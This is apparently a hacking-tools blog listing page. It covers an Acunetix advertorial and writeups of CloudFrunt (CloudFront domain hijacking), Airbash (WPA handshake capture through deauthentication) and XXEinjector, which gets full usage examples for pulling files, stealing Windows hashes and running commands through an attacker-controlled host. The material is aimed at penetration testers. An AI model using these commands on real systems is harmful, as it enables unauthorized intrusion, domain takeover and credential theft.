Acunetix v12 – More Comprehensive More Accurate & 2x Faster
Acunetix, the pioneer in automated web application security software, has announced the release of Acunetix v12. This new version provides support for JavaScript ES7 to better analyse sites which rely heavily on JavaScript such as SPAs. This coupled with a new AcuSensor for Java web applications, sets Acunetix ahead of the curve in its ability to comprehensively and accurately scan all types of websites.
With v12 also comes a brand new scanning engine, re-engineered and re-written from the ground up, making Acunetix the fastest scanning engine in the industry.
Acunetix was always in the forefront when it came to accuracy and speed, however now with the re-engineered scanning engine and sensors that support the latest JavaScript and Java technologies, we are seeing websites scanned up to 2x faster without any compromise on accuracy.
– Announced Nicholas Sciberras, CTO.
Acunetix v12 Support for latest JavaScript
Acunetix DeepScan and the Acunetix Login Sequence Recorder have been updated to support ECMAScript version 6 (ES6) and ECMAScript version 7 (ES7). This allows Acunetix to better analyse JavaScript-rich sites which make use of the latest JavaScript features. The modularity of the new Acunetix architecture also makes it much easier now for the technology to stay ahead of the industry curve.
AcuSensor for Java
Acunetix version 12 includes a new AcuSensor for Java web applications. This improves the coverage of the web site and the detection of web vulnerabilities, decreases false positives and provides more information on the vulnerabilities identified. While already supporting PHP and ASP .NET, the introduction of Java support in AcuSensor means that Acunetix coverage for interactive gray box scanning of web applications is now possibly the widest in the industry.
Speed and efficiency with Multi-Engine
Combining the fastest scanning engine with the ability to scan multiple sites at a time, in a multi-engine environment, allows users to scan thousands of sites in the least time possible. The Acunetix Multi-engine setup is suitable for Enterprise customers who need to scan more than 10 websites or web applications at the same time. This can be achieved by installing one Main Installation and multiple Scanning Engines, all managed from a central console.
Pause / Resume Feature
Acunetix Version 12 allows the user to pause a Scan and Resume the scan at a later stage. Acunetix will proceed with the scan from where it had left off. There is no need to save any scan state files or similiar – the information about the paused scan is automatically retained in Acunetix.
A trial version can be downloaded from:
Topic: Advertorial
CloudFrunt – Identify Misconfigured CloudFront Domains
CloudFrunt is a Python-based tool for identifying misconfigured CloudFront domains, it uses DNS and looks for CNAMEs which may be allowed to be associated with CloudFront distributions. This effectively allows for domain hijacking.
How CloudFrunt Works For Misconfigured CloudFront
CloudFront is a Content Delivery Network (CDN) provided by Amazon Web Services (AWS). CloudFront users create “distributions” that serve content from specific sources (an S3 bucket, for example).
Each CloudFront distribution has a unique endpoint for users to point their DNS records to (ex. d111111abcdef8.cloudfront.net). All of the domains using a specific distribution need to be listed in the “Alternate Domain Names (CNAMEs)” field in the options for that distribution.
When a CloudFront endpoint receives a request, it does NOT automatically serve content from the corresponding distribution. Instead, CloudFront uses the HOST header of the request to determine which distribution to use. This means two things:
- If the HOST header does not match an entry in the “Alternate Domain Names (CNAMEs)” field of the intended distribution, the request will fail.
- Any other distribution that contains the specific domain in the HOST header will receive the request and respond to it normally.
This is what allows the domains to be hijacked. There are many cases where a CloudFront user fails to list all the necessary domains that might be received in the HOST header. For example:
- The domain “test.disloops.com” is a CNAME record that points to “disloops.com”.
- The “disloops.com” domain is set up to use a CloudFront distribution.
- Because “test.disloops.com” was not added to the “Alternate Domain Names (CNAMEs)” field for the distribution, requests to “test.disloops.com” will fail.
- Another user can create a CloudFront distribution and add “test.disloops.com” to the “Alternate Domain Names (CNAMEs)” field to hijack the domain.
This means that the unique endpoint that CloudFront binds to a single distribution is effectively meaningless. A request to one specific CloudFront subdomain is not limited to the distribution it is associated with.
CloudFrunt Usage to Identify Misconfigured CloudFront
After installing CloudFrunt and its dependencies you can run it with the following options:
|
1 2 3 4 5 6 7 8 9 |
cloudfrunt.py [-h] [-l TARGET_FILE] [-d DOMAINS] [-o ORIGIN] [-i ORIGIN_ID] [-s] [-N] -h, --help Show this message and exit -s, --save Save the results to results.txt -N, --no-dns Do not use dnsrecon to expand scope -l, --target-file TARGET_FILE File containing a list of domains (one per line) -d, --domains DOMAINS Comma-separated list of domains to scan -o, --origin ORIGIN Add vulnerable domains to new distributions with this origin -i, --origin-id ORIGIN_ID The origin ID to use with new distributions |
CloudFrunt Usage
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 |
$ python cloudfrunt.py -o cloudfrunt.com.s3-website-us-east-1.amazonaws.com -i S3-cloudfrunt -l list.txt CloudFrunt v1.0.4 [+] Enumerating DNS entries for google.com [-] No issues found for google.com [+] Enumerating DNS entries for disloops.com [+] Found CloudFront domain --> cdn.disloops.com [+] Found CloudFront domain --> test.disloops.com [-] Potentially misconfigured CloudFront domains: [#] --> test.disloops.com [+] Created new CloudFront distribution EXBC12DE3F45G [+] Added test.disloops.com to CloudFront distribution EXBC12DE3F45G |
Related but not so similar is:
AWSBucketDump – AWS S3 Security Scanning Tool
You can download CloudFrunt here:
Or read more here.
Topic: Hacking Tools
Airbash – Fully Automated WPA PSK Handshake Capture Script
Airbash is a POSIX-compliant, fully automated WPA PSK handshake capture script aimed at penetration testing. It is compatible with Bash and Android Shell (tested on Kali Linux and Cyanogenmod 10.2) and uses aircrack-ng to scan for clients that are currently connected to access points (AP).
Those clients are then deauthenticated in order to capture the handshake when attempting to reconnect to the AP. Verification of a captured handshake is done using aircrack-ng. If one or more handshakes are captured, they are entered into an SQLite3 database, along with the time of capture and current GPS data (if properly configured).
After capture, the database can be tested for vulnerable router models using crackdefault.sh. It will search for entries that match the implemented modules, which currently include algorithms to compute default keys for Speedport 500-700 series, Thomson/SpeedTouch and UPC 7 digits (UPC1234567) routers.
Calculating Default WPA PSK Keys
After capturing a new handshake, the database can be queried for vulnerable router models. If a module applies, the default keys for this router series are calculated and used as input for aircrack-ng to try and recover the passphrase.
Airbash WPA PSK Handshake Capture Tool Usage
Running install.sh will create the database, prepare the folder structure and create shortlinks to both scripts which can be moved to a directory that is on $PATH to allow execution from any location.
After installation, you may need to manually adjust INTERFACE on line 46 in airba.sh. This will later be determined automatically, but for now the default is set to wlan0, to allow out of the box compatibility with bcmon on Android.
– ./airba.sh starts the script, automatically scanning and attacking targets that are not found in the database.
– ./crackdefault.sh attempts to break known default key algorithms.
To view the database contents, run sqlite3 .db.sqlite3 "SELECT * FROM hs" in the main directory.
You can download Airbash here:
Or read more here.
Topic: Hacking Tools
XXEinjector – Automatic XXE Injection Tool For Exploitation
XXEinjector is a Ruby-based XXE Injection Tool that automates retrieving files using direct and out of band methods. Directory listing only works in Java applications and the brute forcing method needs to be used for other applications.
Usage of XXEinjector XXE Injection Tool
XXEinjector actually has a LOT of options, so do have a look through to see how you can best leverage this type of attack. Obviously Ruby is a prequisite to run the tool.
|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 |
--host Mandatory - our IP address for reverse connections. (--host=192.168.0.2) --file Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt) --path Mandatory if enumerating directories - Path to enumerate. (--path=/etc) --brute Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt) --logger Log results only. Do not send requests. HTTP logger looks for "p" parameter with results. --rhost Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=192.168.0.3) --rport Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080) --oob Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher) --direct Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK) --cdata Improve direct exploitation with CDATA. Data is retrieved directly, however OOB is used to construct CDATA payload. Specify --cdata-xml to see how request should look like in this technique. --2ndfile File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt) --phpfilter Use PHP filter to base64 encode target file before sending. --netdoc Use netdoc protocol instead of file (Java). --enumports Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445) --hashes Steals Windows hash of the user that runs an application. --expect Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls) --upload Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt) --xslt Tests for XSLT injection. --ssl Use SSL. --proxy Proxy to use. (--proxy=127.0.0.1:8080) --httpport Set custom HTTP port. (--httpport=80) --ftpport Set custom FTP port. (--ftpport=21) --gopherport Set custom gopher port. (--gopherport=70) --jarport Set custom port for uploading files using jar. (--jarport=1337) --xsltport Set custom port for XSLT injection test. (--xsltport=1337) --test This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server. --urlencode URL encode injected DTD. This is default for URI. --nodtd If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like. --output Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt) --timeout Timeout for receiving file/directory content. (--timeout=20) --contimeout Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20) --fast Skip asking what to enumerate. Prone to false-positives. --verbose Show verbose messages. |
If you aren’t familiar with XXE attacks you should start here first:
– XXE Injection Attacks – XML External Entity Vulnerability With Examples
Usage examples for XXinjector
Enumerating /etc directory in HTTPS application:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --ssl |
Enumerating /etc directory using gopher for OOB method:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/req.txt --oob=gopher |
Second order exploitation:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt |
Bruteforcing files using HTTP out of band method and netdoc protocol:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc |
Enumerating using direct exploitation:
|
1 |
ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK |
Enumerating unfiltered ports:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --enumports=all |
Stealing Windows hashes:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --hashes |
Uploading files using Java jar:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf |
Executing system commands using PHP expect:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --oob=http --phpfilter --expect=ls |
Testing for XSLT injection:
|
1 |
ruby XXEinjector.rb --host=192.168.0.2 --file=/tmp/req.txt --xslt |
Log requests only:
|
1 |
ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt |
You can download XXEinjector here:
Or read more here.
Topic: Hacking Tools
Yahoo! Fined 35 Million USD For Late Disclosure Of Hack
Ah Yahoo! in trouble again, this time the news is Yahoo! fined for 35 million USD by the SEC for the 2 years delayed disclosure of the massive hack, we actually reported on the incident in 2016 when it became public – Massive Yahoo Hack – 500 Million Accounts Compromised. Yahoo! has been having a […]
Topic: Hacking News
Drupwn – Drupal Enumeration Tool & Security Scanner
Drupwn is a Python-based Drupal Enumeration Tool that also includes an exploit mode, which can check for and exploit relevant CVEs. Drupwn Drupal Enumeration Tool Hacking Features Drupwn can be run, using two separate modes which are enum and exploit. The enum mode allows performing enumerations whereas the exploit mode allows checking and exploiting CVEs. […]
Topic: Hacking Tools